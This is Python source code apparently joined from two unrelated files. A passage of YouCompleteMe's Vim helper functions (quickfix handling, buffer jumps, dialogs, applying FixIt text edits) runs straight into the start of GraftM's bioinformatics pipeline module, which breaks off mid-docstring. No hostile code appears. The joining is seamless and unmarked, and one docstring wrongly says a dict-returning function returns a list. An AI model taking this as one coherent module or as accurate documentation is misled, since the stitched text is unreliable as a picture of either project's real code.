    vim.command( 'doautocmd User YcmQuickFixOpened' )

  if not focus:
    # :copen left the quickfix window focused; give the user their window back.
    JumpToPreviousWindow()


def SetFittingHeightForCurrentWindow():
  """Resize the current window so every (wrapped) buffer line is visible."""
  window_width = GetIntValue( 'winwidth( 0 )' )
  # Each buffer line needs at least one screen line, plus one more for every
  # full wrap of the window width.
  fitting_height = sum( len( line ) // window_width + 1
                        for line in vim.current.buffer )
  vim.command( '{0}wincmd _'.format( fitting_height ) )


def ConvertDiagnosticsToQfList( diagnostics ):
  """Convert ycmd diagnostics into Vim quickfix entries (see :h getqflist)."""
  def _ToQfFormat( diagnostic ):
    # Note that, as usual, Vim is completely inconsistent about whether
    # line/column numbers are 1 or 0 based in its various APIs. Here, it wants
    # them to be 1-based. The documentation states quite clearly that it
    # expects a byte offset, by which it means "1-based column number" as
    # described in :h getqflist ("the first column is 1").
    location = diagnostic[ 'location' ]
    # libclang can give us diagnostics that point "outside" the file; Vim borks
    # on these.
    line_num = max( location[ 'line_num' ], 1 )

    text = diagnostic[ 'text' ]
    if diagnostic.get( 'fixit_available', False ):
      text += ' (FixIt available)'

    return {
      'bufnr' : GetBufferNumberForFilename( location[ 'filepath' ] ),
      'lnum'  : line_num,
      'col'   : location[ 'column_num' ],
      'text'  : text,
      'type'  : diagnostic[ 'kind' ][ 0 ],
      'valid' : 1
    }

  return list( map( _ToQfFormat, diagnostics ) )


def GetVimGlobalsKeys():
  """Return the names of all global (g:) Vim variables."""
  names = vim.eval( 'keys( g: )' )
  return names


def VimExpressionToPythonType( vim_expression ):
  """Returns a Python type from the return value of the supplied Vim expression.
  If the expression returns a list, dict or other non-string type, then it is
  returned unmodified. If the string return can be converted to an
  integer, returns an integer, otherwise returns the result converted to a
  Unicode string."""

  result = vim.eval( vim_expression )
  # Idiom: one isinstance() call with a tuple of types instead of an or-chain.
  if not isinstance( result, ( str, bytes ) ):
    return result

  try:
    return int( result )
  except ValueError:
    return ToUnicode( result )


def HiddenEnabled( buffer_object ):
  """Return True if the buffer's 'hidden' ('hid') option is set."""
  return int( GetBufferOption( buffer_object, 'hid' ) ) != 0


def BufferIsUsable( buffer_object ):
  """A buffer may be reused when it has no unsaved changes or may be hidden."""
  if not BufferModified( buffer_object ):
    return True
  return HiddenEnabled( buffer_object )


def EscapedFilepath( filepath ):
  """Escape spaces in |filepath| for use on a Vim command line."""
  return r'\ '.join( filepath.split( ' ' ) )


# Both |line| and |column| need to be 1-based
def TryJumpLocationInOpenedTab( filename, line, column ):
  """Move the cursor to (|line|, |column|) of |filename| if that file is
  already shown in a window of some tab page; returns True on success, False
  when no tab page shows the file. |line| and |column| are 1-based."""
  filepath = os.path.realpath( filename )

  for tab in vim.tabpages:
    for win in tab.windows:
      if win.buffer.name == filepath:
        vim.current.tabpage = tab
        vim.current.window = win
        # Vim cursor columns are 0-based while |column| is 1-based.
        vim.current.window.cursor = ( line, column - 1 )

        # Center the screen on the jumped-to location
        vim.command( 'normal! zz' )
        return True
  # 'filename' is not opened in any tab pages
  return False


# Maps User command to vim command
def GetVimCommand( user_command, default = 'edit' ):
  """Translate a user 'goto_buffer_command' value into an actual Vim command,
  falling back to a split when the current buffer cannot be abandoned."""
  command = BUFFER_COMMAND_MAP.get( user_command, default )
  if command == 'edit' and not BufferIsUsable( vim.current.buffer ):
    return 'split'
  return command


# Both |line| and |column| need to be 1-based
def JumpToLocation( filename, line, column ):
  """Move the cursor to 1-based (|line|, |column|) in |filename|, opening the
  file per the user's 'goto_buffer_command' option when it is not the current
  buffer. The previous position is recorded in the jumplist."""
  # Add an entry to the jumplist
  vim.command( "normal! m'" )

  if filename != GetCurrentBufferFilepath():
    # We prefix the command with 'keepjumps' so that opening the file is not
    # recorded in the jumplist. So when we open the file and move the cursor to
    # a location in it, the user can use CTRL-O to jump back to the original
    # location, not to the start of the newly opened file.
    # Sadly this fails on random occasions and the undesired jump remains in the
    # jumplist.
    user_command = user_options_store.Value( 'goto_buffer_command' )

    if user_command == 'new-or-existing-tab':
      # Reuse a tab that already shows the file; otherwise fall back to a
      # fresh tab.
      if TryJumpLocationInOpenedTab( filename, line, column ):
        return
      user_command = 'new-tab'

    vim_command = GetVimCommand( user_command )
    try:
      vim.command( 'keepjumps {0} {1}'.format( vim_command,
                                               EscapedFilepath( filename ) ) )
    # When the file we are trying to jump to has a swap file
    # Vim opens swap-exists-choices dialog and throws vim.error with E325 error,
    # or KeyboardInterrupt after user selects one of the options.
    except vim.error as e:
      if 'E325' not in str( e ):
        raise
      # Do nothing if the target file is still not opened (user chose (Q)uit)
      if filename != GetCurrentBufferFilepath():
        return
    # Thrown when user chooses (A)bort in .swp message box
    except KeyboardInterrupt:
      return
  # Vim cursor columns are 0-based while |column| is 1-based.
  vim.current.window.cursor = ( line, column - 1 )

  # Center the screen on the jumped-to location
  vim.command( 'normal! zz' )


def NumLinesInBuffer( buffer_object ):
  """Return the number of lines in a Vim buffer object."""
  # Buffer objects expose their line count via len(); wrapping that in a
  # named function keeps call sites self-explanatory.
  return len( buffer_object )


# Calling this function from the non-GUI thread will sometimes crash Vim. At
# the time of writing, YCM only uses the GUI thread inside Vim (this used to
# not be the case).
def PostVimMessage( message, warning = True, truncate = False ):
  """Display a message on the Vim status line. By default, the message is
  highlighted and logged to Vim command-line history (see :h history).
  Unset the |warning| parameter to disable this behavior. Set the |truncate|
  parameter to avoid hit-enter prompts (see :h hit-enter) when the message is
  longer than the window width."""
  # :echom records in message history; :echo does not.
  echo_command = 'echom' if warning else 'echo'

  # Displaying a new message while previous ones are still on the status line
  # might lead to a hit-enter prompt or the message appearing without a
  # newline so we do a redraw first.
  vim.command( 'redraw' )

  if warning:
    vim.command( 'echohl WarningMsg' )

  message = ToUnicode( message )

  if truncate:
    vim_width = GetIntValue( '&columns' )

    message = message.replace( '\n', ' ' )
    if len( message ) > vim_width:
      # Leave room for the '...' marker (and a spare column).
      message = message[ : vim_width - 4 ] + '...'

    # 'ruler' and 'showcmd' also occupy the last screen line; disable them
    # while echoing so the message is not truncated further.
    old_ruler = GetIntValue( '&ruler' )
    old_showcmd = GetIntValue( '&showcmd' )
    vim.command( 'set noruler noshowcmd' )

    vim.command( "{0} '{1}'".format( echo_command,
                                     EscapeForVim( message ) ) )

    # Restore the user's original option values.
    SetVariableValue( '&ruler', old_ruler )
    SetVariableValue( '&showcmd', old_showcmd )
  else:
    for line in message.split( '\n' ):
      vim.command( "{0} '{1}'".format( echo_command,
                                       EscapeForVim( line ) ) )

  if warning:
    vim.command( 'echohl None' )


def PresentDialog( message, choices, default_choice_index = 0 ):
  """Presents the user with a dialog where a choice can be made.
  This will be a dialog for gvim users or a question in the message buffer
  for vim users or if `set guioptions+=c` was used.

  choices is list of alternatives.
  default_choice_index is the 0-based index of the default element
  that will get choosen if the user hits <CR>. Use -1 for no default.

  PresentDialog will return a 0-based index into the list
  or -1 if the dialog was dismissed by using <Esc>, Ctrl-C, etc.

  If you are presenting a list of options for the user to choose from, such as
  a list of imports, or lines to insert (etc.), SelectFromList is a better
  option.

  See also:
    :help confirm() in vim (Note that vim uses 1-based indexes)

  Example call:
    PresentDialog("Is this a nice example?", ["Yes", "No", "May&be"])
      Is this a nice example?
      [Y]es, (N)o, May(b)e:"""
  confirm_expr = "confirm('{0}', '{1}', {2})".format(
    EscapeForVim( ToUnicode( message ) ),
    EscapeForVim( ToUnicode( '\n'.join( choices ) ) ),
    default_choice_index + 1 )
  try:
    # confirm() answers are 1-based; translate to the 0-based index we promise.
    return GetIntValue( confirm_expr ) - 1
  except KeyboardInterrupt:
    return -1


def Confirm( message ):
  """Display |message| with Ok/Cancel operations. Returns True if the user
  selects Ok"""
  choice = PresentDialog( message, [ "Ok", "Cancel" ] )
  return choice == 0


def SelectFromList( prompt, items ):
  """Ask the user to select an item from the list |items|.

  Presents the user with |prompt| followed by a numbered list of |items|,
  from which they select one. The user is asked to enter the number of an
  item or click it.

  |items| should not contain leading ordinals: they are added automatically.

  Returns the 0-based index in the list |items| that the user selected, or a
  negative number if no valid item was selected.

  See also :help inputlist()."""

  vim_items = [ prompt ]
  vim_items.extend( [ "{0}: {1}".format( i + 1, item )
                      for i, item in enumerate( items ) ] )

  # The vim documentation warns not to present lists larger than the number of
  # lines of display. This is sound advice, but there really isn't any sensible
  # thing we can do in that scenario. Testing shows that Vim just pages the
  # message; that behaviour is as good as any, so we don't manipulate the list,
  # or attempt to page it.

  # For an explanation of the purpose of inputsave() / inputrestore(),
  # see :help input(). Briefly, it makes inputlist() work as part of a mapping.
  vim.eval( 'inputsave()' )
  try:
    # Vim returns the number the user entered, or the line number the user
    # clicked. This may be wildly out of range for our list. It might even be
    # negative.
    #
    # The first item is index 0, and this maps to our "prompt", so we subtract 1
    # from the result and return that, assuming it is within the range of the
    # supplied list. If not, we return negative.
    #
    # See :help input() for explanation of the use of inputsave() and
    # inputrestore(). It is done in try/finally in case vim.eval ever throws an
    # exception (such as KeyboardInterrupt)
    selected = GetIntValue( "inputlist( " + json.dumps( vim_items ) + " )" ) - 1
  except KeyboardInterrupt:
    selected = -1
  finally:
    vim.eval( 'inputrestore()' )

  if selected < 0 or selected >= len( items ):
    # User selected something outside of the range
    raise RuntimeError( NO_SELECTION_MADE_MSG )

  return selected


def EscapeForVim( text ):
  """Escape single quotes so |text| can be embedded in a Vim single-quoted
  string literal."""
  escaped = text.replace( "'", "''" )
  return ToUnicode( escaped )


def CurrentFiletypes():
  """Return the current buffer's filetypes ('&filetype' is dot-separated)."""
  filetype = VimExpressionToPythonType( "&filetype" )
  return filetype.split( '.' )


def GetBufferFiletypes( bufnr ):
  """Return the list of filetypes for buffer |bufnr|."""
  expr = 'getbufvar({0}, "&ft")'.format( bufnr )
  return VimExpressionToPythonType( expr ).split( '.' )


def FiletypesForBuffer( buffer_object ):
  """Return the list of filetypes for a buffer object."""
  # NOTE: Getting &ft for other buffers only works when the buffer has been
  # visited by the user at least once, which is true for modified buffers
  filetype = GetBufferOption( buffer_object, 'ft' )
  return filetype.split( '.' )


def VariableExists( variable ):
  """Return True if Vim reports that |variable| exists (see :h exists())."""
  expr = "exists( '{0}' )".format( EscapeForVim( variable ) )
  return GetBoolValue( expr )


def SetVariableValue( variable, value ):
  """Assign |value| (JSON-encoded for Vim) to the Vim variable |variable|."""
  serialized = json.dumps( value )
  vim.command( "let {0} = {1}".format( variable, serialized ) )


def GetVariableValue( variable ):
  """Evaluate the Vim variable/expression |variable| and return the result."""
  return vim.eval( variable )


def GetBoolValue( variable ):
  """Evaluate |variable| and coerce the result to a boolean."""
  return GetIntValue( variable ) != 0


def GetIntValue( variable ):
  """Evaluate |variable| and coerce the result to an int."""
  result = vim.eval( variable )
  return int( result )


def _SortChunksByFile( chunks ):
  """Sort the members of the list |chunks| (which must be a list of dictionaries
  conforming to ycmd.responses.FixItChunk) by their filepath. Returns a new
  list in arbitrary order."""

  chunks_by_file = defaultdict( list )

  for chunk in chunks:
    filepath = chunk[ 'range' ][ 'start' ][ 'filepath' ]
    chunks_by_file[ filepath ].append( chunk )

  return chunks_by_file


def _GetNumNonVisibleFiles( file_list ):
  """Returns the number of files in the iterable |file_list| which are not
  currently open in visible windows."""
  return sum( 1 for f in file_list
              if not BufferIsVisible( GetBufferNumberForFilename( f, False ) ) )


def _OpenFileInSplitIfNeeded( filepath ):
  """Ensure that the supplied filepath is open in a visible window, opening a
  new split if required. Returns the buffer number of the file and an indication
  of whether or not a new split was opened.

  If the supplied filename is already open in a visible window, return just
  return its buffer number. If the supplied file is not visible in a window
  in the current tab, opens it in a new vertical split.

  Returns a tuple of ( buffer_num, split_was_opened ) indicating the buffer
  number and whether or not this method created a new split. If the user opts
  not to open a file, or if opening fails, this method raises RuntimeError,
  otherwise, guarantees to return a visible buffer number in buffer_num."""

  buffer_num = GetBufferNumberForFilename( filepath, False )

  # We only apply changes in the current tab page (i.e. "visible" windows).
  # Applying changes in tabs does not lead to a better user experience, as the
  # quickfix list no longer works as you might expect (doesn't jump into other
  # tabs), and the complexity of choosing where to apply edits is significant.
  if BufferIsVisible( buffer_num ):
    # file is already open and visible, just return that buffer number (and an
    # indicator that we *didn't* open a split)
    return ( buffer_num, False )

  # The file is not open in a visible window, so we open it in a split.
  # We open the file with a small, fixed height. This means that we don't
  # make the current buffer the smallest after a series of splits.
  # NOTE(review): OpenFilename is defined elsewhere in this module; the option
  # keys used here ('focus', 'fix', 'size') are presumably its window options.
  OpenFilename( filepath, {
    'focus': True,
    'fix': True,
    'size': GetIntValue( '&previewheight' ),
  } )

  # OpenFilename returns us to the original cursor location. This is what we
  # want, because we don't want to disorientate the user, but we do need to
  # know the (now open) buffer number for the filename
  buffer_num = GetBufferNumberForFilename( filepath, False )
  if not BufferIsVisible( buffer_num ):
    # This happens, for example, if there is a swap file and the user
    # selects the "Quit" or "Abort" options. We just raise an exception to
    # make it clear to the user that the abort has left potentially
    # partially-applied changes.
    raise RuntimeError(
        'Unable to open file: {0}\nFixIt/Refactor operation '
        'aborted prior to completion. Your files have not been '
        'fully updated. Please use undo commands to revert the '
        'applied changes.'.format( filepath ) )

  # We opened this file in a split
  return ( buffer_num, True )


def ReplaceChunks( chunks ):
  """Apply a list of ycmd.responses.FixItChunk deltas to the files they
  reference.

  Chunks are grouped per file and applied file-by-file. Any file that is not
  already visible in the current tab page is opened in a split (after asking
  the user for confirmation), modified, and hidden again. The location of
  every applied change is collected and shown in the quickfix list.

  Raises RuntimeError if a file could not be opened or changed; otherwise
  returns no meaningful value."""

  # Group the edits per file: deltas caused by earlier edits only affect
  # later edits within the same file, so we track them file-wise.
  file_to_chunks = _SortChunksByFile( chunks )

  # A deterministic processing order keeps testing repeatable.
  filenames = sorted( iterkeys( file_to_chunks ) )

  # Warn the user before opening any new buffers and offer a clean abort.
  new_buffer_count = _GetNumNonVisibleFiles( filenames )
  if new_buffer_count > 0 and not Confirm(
      FIXIT_OPENING_BUFFERS_MESSAGE_FORMAT.format( new_buffer_count ) ):
    return

  # Every position we touch is recorded here and later fed to the quickfix
  # list, so the user can review where changes were made.
  qf_locations = []

  for path in filenames:
    ( bufnr, opened_split ) = _OpenFileInSplitIfNeeded( path )

    ReplaceChunksInBuffer( file_to_chunks[ path ],
                           vim.buffers[ bufnr ],
                           qf_locations )

    if opened_split:
      # The split was created only for this edit; keeping one split per file
      # would not scale, so close it again. Some plugins (e.g. syntastic)
      # may have opened a location list for the new window - close that
      # first (lclose is a no-op when there is no location list).
      vim.command( 'lclose' )

      # 'hide' does not lose the changes: the buffer is merely hidden and
      # remains reachable via the quickfix list or :ls.
      vim.command( 'hide' )

  # Present all changed locations to the user.
  if qf_locations:
    SetQuickFixList( qf_locations )
    OpenQuickFixList()

  PostVimMessage( 'Applied {0} changes'.format( len( chunks ) ),
                  warning = False )


def ReplaceChunksInBuffer( chunks, vim_buffer, locations ):
  """Apply the changes in |chunks| to the buffer-like object |vim_buffer|.
  Append a quickfix entry for each chunk's start position to the list
  |locations|.

  NOTE: sorts |chunks| in place, ascending by start position."""

  # We need to track the difference in length, but ensuring we apply fixes
  # in ascending order of insertion point.
  chunks.sort( key = lambda chunk: (
    chunk[ 'range' ][ 'start' ][ 'line_num' ],
    chunk[ 'range' ][ 'start' ][ 'column_num' ]
  ) )

  # Remember the line number we're processing. Negative line number means we
  # haven't processed any lines yet (by nature of being not equal to any
  # real line number).
  last_line = -1

  # Cumulative shift (in lines / in bytes on the current line) caused by the
  # chunks already applied; fed into ReplaceChunk so later offsets stay valid.
  line_delta = 0
  for chunk in chunks:
    if chunk[ 'range' ][ 'start' ][ 'line_num' ] != last_line:
      # If this chunk is on a different line than the previous chunk,
      # then ignore previous deltas (as offsets won't have changed).
      # NOTE(review): |last_line| stores the chunk's *end* line while the
      # comparison above uses the next chunk's *start* line - presumably
      # intentional for multi-line chunks, but worth confirming.
      last_line = chunk[ 'range' ][ 'end' ][ 'line_num' ]
      char_delta = 0

    ( new_line_delta, new_char_delta ) = ReplaceChunk(
      chunk[ 'range' ][ 'start' ],
      chunk[ 'range' ][ 'end' ],
      chunk[ 'replacement_text' ],
      line_delta, char_delta,
      vim_buffer,
      locations )
    line_delta += new_line_delta
    char_delta += new_char_delta


# Replace the chunk of text specified by a contiguous range with the supplied
# text.
# * start and end are objects with line_num and column_num properties
# * the range is inclusive
# * indices are all 1-based
# * the returned character delta is the delta for the last line
#
# returns the delta (in lines and characters) that any position after the end
# needs to be adjusted by.
#
# NOTE: Works exclusively with bytes() instances and byte offsets as returned
# by ycmd and used within the Vim buffers
def ReplaceChunk( start, end, replacement_text, line_delta, char_delta,
                  vim_buffer, locations = None ):
  """Replace the text range delimited by |start| and |end| (objects with
  1-based 'line_num' and 'column_num' byte offsets, per the contract comment
  above) in |vim_buffer| with |replacement_text|, after shifting the range by
  |line_delta| and |char_delta| accumulated from earlier edits.

  Returns a ( line_delta, char_delta ) tuple that any position after the end
  of this chunk must be adjusted by; the character delta applies only to the
  last line of the replaced range. If |locations| is a list, a quickfix-style
  entry for the start of the change is appended to it.

  NOTE: works exclusively with byte offsets, as returned by ycmd and used
  within Vim buffers."""
  # ycmd's results are all 1-based, but vim's/python's are all 0-based
  # (so we do -1 on all of the values)
  start_line = start[ 'line_num' ] - 1 + line_delta
  end_line = end[ 'line_num' ] - 1 + line_delta

  source_lines_count = end_line - start_line + 1
  start_column = start[ 'column_num' ] - 1 + char_delta
  end_column = end[ 'column_num' ] - 1
  # char_delta only applies to the end column when start and end are on the
  # same line; otherwise the end line was not shifted by previous edits.
  if source_lines_count == 1:
    end_column += char_delta

  # NOTE: replacement_text is unicode, but all our offsets are byte offsets,
  # so we convert to bytes
  replacement_lines = ToBytes( replacement_text ).splitlines( False )
  if not replacement_lines:
    replacement_lines = [ bytes( b'' ) ]
  replacement_lines_count = len( replacement_lines )

  # NOTE: Vim buffers are a list of byte objects on Python 2 but unicode
  # objects on Python 3.
  end_existing_text = ToBytes( vim_buffer[ end_line ] )[ end_column : ]
  start_existing_text = ToBytes( vim_buffer[ start_line ] )[ : start_column ]

  # Character delta for positions after the chunk on its final line: the
  # length of the last replacement line minus the length of the text removed.
  new_char_delta = ( len( replacement_lines[ -1 ] )
                     - ( end_column - start_column ) )
  if replacement_lines_count > 1:
    new_char_delta -= start_column

  # Preserve the untouched text before and after the replaced range.
  replacement_lines[ 0 ] = start_existing_text + replacement_lines[ 0 ]
  replacement_lines[ -1 ] = replacement_lines[ -1 ] + end_existing_text

  vim_buffer[ start_line : end_line + 1 ] = replacement_lines[:]

  if locations is not None:
    locations.append( {
      'bufnr': vim_buffer.number,
      'filename': vim_buffer.name,
      # line and column numbers are 1-based in qflist
      'lnum': start_line + 1,
      'col': start_column + 1,
      'text': replacement_text,
      'type': 'F',
    } )

  new_line_delta = replacement_lines_count - source_lines_count
  return ( new_line_delta, new_char_delta )


def InsertNamespace( namespace ):
  """Insert a C# 'using' directive for |namespace| into the current buffer.

  If the user has set g:ycm_csharp_insert_namespace_expr, that Vim expression
  is evaluated to perform the insertion instead (the namespace is passed via
  g:ycm_namespace_to_insert). Otherwise the new 'using' line is inserted
  immediately after the closest existing using statement above the cursor
  (matching its indentation), or at the top of the file when none exists."""
  if VariableExists( 'g:ycm_csharp_insert_namespace_expr' ):
    expr = GetVariableValue( 'g:ycm_csharp_insert_namespace_expr' )
    if expr:
      SetVariableValue( "g:ycm_namespace_to_insert", namespace )
      vim.eval( expr )
      return

  # Raw string: this is a Vim regex, and atoms like \s, \( and \+ are not
  # valid Python escape sequences (non-raw, they'd trigger warnings on
  # modern Pythons; the byte content is identical).
  pattern = r'^\s*using\(\s\+[a-zA-Z0-9]\+\s\+=\)\?\s\+[a-zA-Z0-9.]\+\s*;\s*'
  existing_indent = ''
  line = SearchInCurrentBuffer( pattern )
  if line:
    existing_line = LineTextInCurrentBuffer( line )
    # Everything before the first non-whitespace character is the indent.
    existing_indent = re.sub( r"\S.*", "", existing_line )
  new_line = "{0}using {1};\n\n".format( existing_indent, namespace )
  # line is 0 when no match was found, so the insert lands at the file top.
  replace_pos = { 'line_num': line + 1, 'column_num': 1 }
  ReplaceChunk( replace_pos, replace_pos, new_line, 0, 0, vim.current.buffer )
  PostVimMessage( 'Add namespace: {0}'.format( namespace ), warning = False )


def SearchInCurrentBuffer( pattern ):
  """Search backwards from (and including) the current position for |pattern|
  in the current buffer. Returns the 1-based line number of the match, or 0
  when there is no match."""
  search_expression = "search('{0}', 'Wcnb')".format( EscapeForVim( pattern ) )
  return GetIntValue( search_expression )


def LineTextInCurrentBuffer( line_number ):
  """Return the text of the 1-based (NOT 0-based) |line_number| in the
  current buffer."""
  current_buffer = vim.current.buffer
  return current_buffer[ line_number - 1 ]


def ClosePreviewWindow():
  """ Close the preview window if it is present, otherwise do nothing
  ('silent!' suppresses the error raised when no preview window exists) """
  vim.command( 'silent! pclose!' )


def JumpToPreviewWindow():
  """ Jump the vim cursor to the preview window. Returns a boolean indicating
  whether the cursor ended up in the preview window (False when no preview
  window is open; 'silent!' suppresses the error in that case) """
  vim.command( 'silent! wincmd P' )
  # The 'previewwindow' window option is only set on the preview window, so
  # this tells us whether the jump actually succeeded.
  return vim.current.window.options[ 'previewwindow' ]


def JumpToPreviousWindow():
  """ Jump the vim cursor back to the previously-focused window ('wincmd p');
  does nothing ('silent!') if there is no previous window """
  vim.command( 'silent! wincmd p' )


def JumpToTab( tab_number ):
  """ Jump to the Vim tab page with the corresponding |tab_number| """
  vim.command( 'silent! tabn {0}'.format( tab_number ) )


def OpenFileInPreviewWindow( filename ):
  """ Open the supplied filename in the preview window ('pedit!');
  errors are suppressed by 'silent!' """
  vim.command( 'silent! pedit! ' + filename )


def WriteToPreviewWindow( message ):
  """ Display the supplied message in the preview window """

  # Vim's preview window normally shows tags or real files, so we trick it:
  # "open" a temporary file name, make the resulting buffer writable, fill it
  # with the message, then lock it down again. This way we inherit the user's
  # preview-window settings (height etc.) rather than opening a plain split.

  ClosePreviewWindow()

  OpenFileInPreviewWindow( vim.eval( 'tempname()' ) )

  if not JumpToPreviewWindow():
    # We couldn't reach the preview window; the only remaining way to give
    # the user the information is to echo it to the status area.
    PostVimMessage( message, warning = False )
    return

  buffer_options = vim.current.buffer.options

  # The preview buffer is read-only by default; unlock it for the write.
  buffer_options[ 'modifiable' ] = True
  buffer_options[ 'readonly' ]   = False

  vim.current.buffer[:] = message.splitlines()

  # Re-lock the buffer and keep it out of the buffer list, off disk and
  # wiped once hidden.
  buffer_options[ 'buftype' ]    = 'nofile'
  buffer_options[ 'bufhidden' ]  = 'wipe'
  buffer_options[ 'buflisted' ]  = False
  buffer_options[ 'swapfile' ]   = False
  buffer_options[ 'modifiable' ] = False
  buffer_options[ 'readonly' ]   = True

  # Pretend the buffer is unchanged so closing the window doesn't warn about
  # an unsaved file.
  buffer_options[ 'modified' ]   = False

  JumpToPreviousWindow()


def BufferIsVisibleForFilename( filename ):
  """Return True if a buffer for |filename| exists and is currently visible."""
  return BufferIsVisible( GetBufferNumberForFilename( filename, False ) )


def CloseBuffersForFilename( filename ):
  """Wipe out every buffer associated with |filename|."""
  buffer_number = GetBufferNumberForFilename( filename, False )
  while buffer_number != -1:
    vim.command( 'silent! bwipeout! {0}'.format( buffer_number ) )
    remaining = GetBufferNumberForFilename( filename, False )
    # If the same buffer number comes back, the wipeout silently failed;
    # raise rather than loop forever.
    if remaining == buffer_number:
      raise RuntimeError( "Buffer {0} for filename '{1}' should already be "
                          "wiped out.".format( buffer_number, filename ) )
    buffer_number = remaining


def OpenFilename( filename, options = None ):
  """Open a file in Vim. Following options are available:
  - command: specify which Vim command is used to open the file. Choices
  are same-buffer, horizontal-split, vertical-split, and new-tab (default:
  horizontal-split);
  - size: set the height of the window for a horizontal split or the width for
  a vertical one (default: '');
  - fix: set the winfixheight option for a horizontal split or winfixwidth for
  a vertical one (default: False). See :h winfix for details;
  - focus: focus the opened file (default: False);
  - watch: automatically watch for changes (default: False). This is useful
  for logs;
  - position: set the position where the file is opened (default: start).
  Choices are start and end."""

  # None-as-default instead of a shared mutable default dict; an omitted
  # argument behaves exactly as the old empty-dict default did.
  if options is None:
    options = {}

  # Set the options.
  command = GetVimCommand( options.get( 'command', 'horizontal-split' ),
                           'horizontal-split' )
  size = ( options.get( 'size', '' ) if command in [ 'split', 'vsplit' ] else
           '' )
  focus = options.get( 'focus', False )

  # There is no command in Vim to return to the previous tab so we need to
  # remember the current tab if needed.
  if not focus and command == 'tabedit':
    previous_tab = GetIntValue( 'tabpagenr()' )
  else:
    previous_tab = None

  # Open the file.
  try:
    vim.command( '{0}{1} {2}'.format( size, command, filename ) )
  # When the file we are trying to jump to has a swap file,
  # Vim opens swap-exists-choices dialog and throws vim.error with E325 error,
  # or KeyboardInterrupt after user selects one of the options which actually
  # opens the file (Open read-only/Edit anyway).
  except vim.error as e:
    if 'E325' not in str( e ):
      raise

    # Otherwise, the user might have chosen Quit. This is detectable by the
    # current file not being the target file
    if filename != GetCurrentBufferFilepath():
      return
  except KeyboardInterrupt:
    # Raised when the user selects "Abort" after swap-exists-choices
    return

  _SetUpLoadedBuffer( command,
                      filename,
                      options.get( 'fix', False ),
                      options.get( 'position', 'start' ),
                      options.get( 'watch', False ) )

  # Vim automatically set the focus to the opened file so we need to get the
  # focus back (if the focus option is disabled) when opening a new tab or
  # window.
  if not focus:
    if command == 'tabedit':
      JumpToTab( previous_tab )
    if command in [ 'split', 'vsplit' ]:
      JumpToPreviousWindow()


def _SetUpLoadedBuffer( command, filename, fix, position, watch ):
  """Configure the buffer that was just opened, according to the supplied
  options (as defined by the OpenFilename method)."""

  window_options = vim.current.window.options

  # |command| is a single Vim command string, so at most one branch applies.
  if command == 'split':
    window_options[ 'winfixheight' ] = fix
  elif command == 'vsplit':
    window_options[ 'winfixwidth' ] = fix

  if watch:
    # Reload the buffer automatically whenever it changes on disk.
    vim.current.buffer.options[ 'autoread' ] = True
    vim.command( "exec 'au BufEnter <buffer> :silent! checktime {0}'"
                 .format( filename ) )

  if position == 'end':
    # Jump to the last line and centre it in the window.
    vim.command( 'silent! normal! Gzz' )

#!/usr/bin/env python3

import os
import logging
import tempfile
import shutil

from graftm.sequence_search_results import SequenceSearchResult
from graftm.graftm_output_paths import GraftMFiles
from graftm.search_table import SearchTableWriter
from graftm.sequence_searcher import SequenceSearcher
from graftm.hmmsearcher import NoInputSequencesException
from graftm.housekeeping import HouseKeeping
from graftm.summarise import Stats_And_Summary
from graftm.pplacer import Pplacer
from graftm.create import Create
from graftm.update import Update
from graftm.unpack_sequences import UnpackRawReads
from graftm.graftm_package import GraftMPackage
from graftm.expand_searcher import ExpandSearcher
from graftm.diamond import Diamond
from graftm.getaxnseq import Getaxnseq
from graftm.sequence_io import SequenceIO
from graftm.timeit import Timer
from graftm.clusterer import Clusterer
from graftm.decorator import Decorator
from graftm.external_program_suite import ExternalProgramSuite
from graftm.archive import Archive
from graftm.decoy_filter import DecoyFilter
from biom.util import biom_open

# Module-level Timer instance (graftm.timeit) shared by this module; its
# timing usage is outside this excerpt - presumably wraps pipeline steps.
T=Timer()

class UnrecognisedSuffixError(Exception):
    """Raised when an input sequence file's suffix is not recognised."""
    pass

class Run:

    # Single-letter pipeline identifiers, stored in args.type:
    # protein (amino acid) and nucleotide (DNA) pipelines respectively.
    PIPELINE_AA             = "P"
    PIPELINE_NT             = "D"

    _MIN_VERBOSITY_FOR_ART = 3 # with 2 then, only errors are printed

    # Supported taxonomic assignment backends (values of --assignment_method).
    PPLACER_TAXONOMIC_ASSIGNMENT = 'pplacer'
    DIAMOND_TAXONOMIC_ASSIGNMENT = 'diamond'

    # Default minimum-aligned-positions filter, used when --filter_minimum is
    # not supplied, per pipeline type.
    MIN_ALIGNED_FILTER_FOR_NUCLEOTIDE_PACKAGES = 95
    MIN_ALIGNED_FILTER_FOR_AMINO_ACID_PACKAGES = 30

    # Krona plot generation is skipped above this many samples (the summarise
    # step takes the actual cap as a parameter, overridable on the CLI).
    DEFAULT_MAX_SAMPLES_FOR_KRONA = 100

    # Process exit status used when no sufficiently long ORFs are found.
    NO_ORFS_EXITSTATUS = 128

    def __init__(self, args):
        """Store the parsed command-line |args| and initialise the helper
        objects required by the selected subcommand (see setattributes)."""
        self.args = args
        self.setattributes(self.args)

    def setattributes(self, args):
        """Set up the helper objects this Run needs, based on which
        subcommand (args.subparser_name) was invoked.

        For 'graft': housekeeping attributes, the sequence searcher, the
        validated input sequence pairs and (when a reference package is
        given) the pplacer wrapper. For 'create': the Create helper.
        Constructing ExternalProgramSuite presumably verifies the listed
        external programs are available - confirm in graftm source."""

        self.hk = HouseKeeping()
        self.s = Stats_And_Summary()
        if args.subparser_name == 'graft':
            commands = ExternalProgramSuite(['orfm', 'nhmmer', 'hmmsearch',
                                             'mfqe', 'pplacer',
                                             'ktImportText', 'diamond'])
            self.hk.set_attributes(self.args)
            self.hk.set_euk_hmm(self.args)
            # When euk screening is requested, the euk HMM joins the search set.
            if args.euk_check:self.args.search_hmm_files.append(self.args.euk_hmm_file)

            # No alignment HMM is needed in search-only mode.
            self.ss = SequenceSearcher(self.args.search_hmm_files,
                           (None if self.args.search_only else self.args.aln_hmm_file))
            self.sequence_pair_list = self.hk.parameter_checks(args)
            if hasattr(args, 'reference_package'):
                self.p = Pplacer(self.args.reference_package)


        elif self.args.subparser_name == "create":
            commands = ExternalProgramSuite(['taxit', 'FastTreeMP',
                                             'hmmalign', 'mafft'])
            self.create = Create(commands)




    def summarise(self, base_list, trusted_placements, reverse_pipe, times,
                  hit_read_count_list, max_samples_for_krona):
        '''
        summarise - write summary information to file, including otu table, biom
                    file, krona plot, and timing information

        Parameters
        ----------
        base_list : array
            list of each of the files processed by graftm, with the path and
            suffix removed
        trusted_placements : dict
